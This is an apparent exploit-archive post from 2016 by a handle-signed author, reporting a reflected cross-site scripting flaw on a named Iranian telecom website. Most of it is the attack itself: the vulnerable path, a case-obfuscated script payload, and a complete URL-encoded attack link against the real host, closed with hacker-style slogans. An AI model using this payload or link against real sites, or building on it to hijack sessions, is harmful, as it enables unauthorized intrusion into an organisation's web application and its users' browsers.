118 Telecom's website suffers from a cross site scripting vulnerability.
a2a09d4a49e075b986ab674b79f96036a615e75e393bed9a2c3c9e3b59fc465a
-----------------------------------------------------------------------------------
Exploit Title : 118 Telecom's website of Iran XSS Vulnerability
Exploit Author : 4TT4CK3R
HomePage : http://118.tct.ir
Tested on : Windows , Firefox
Discovered by : 4TT4CK3R
Category : WebApp
Date : 2016/01/22
-----------------------------------------------------------------------------------
Vulnerable Directory :
http://118.tct.ir/exe/
Add this script at the end of Vulnerable directory :
<ScrIpT>alert(String.fromCharCode(52, 84, 84, 52, 67, 75, 51, 82))</ScRipT>
This Code "String.fromCharCode(52, 84, 84, 52, 67, 75, 51, 82)" is a CharCode
that is 4TT4CK3R for testig !!
Our Target is :
http://118.tct.ir/exe/%3CScrIpT%3Ealert%28String.fromCharCode%2852,%2084,%2084,%2052,%2067,%2075,%2051,%2082%29%29%3C/ScRipT%3E
-----------------------------------------------------------------------------------
-->> My enemies are ridiculous men
-->> We LovE IraN
-----------------------------------------------------------------------------------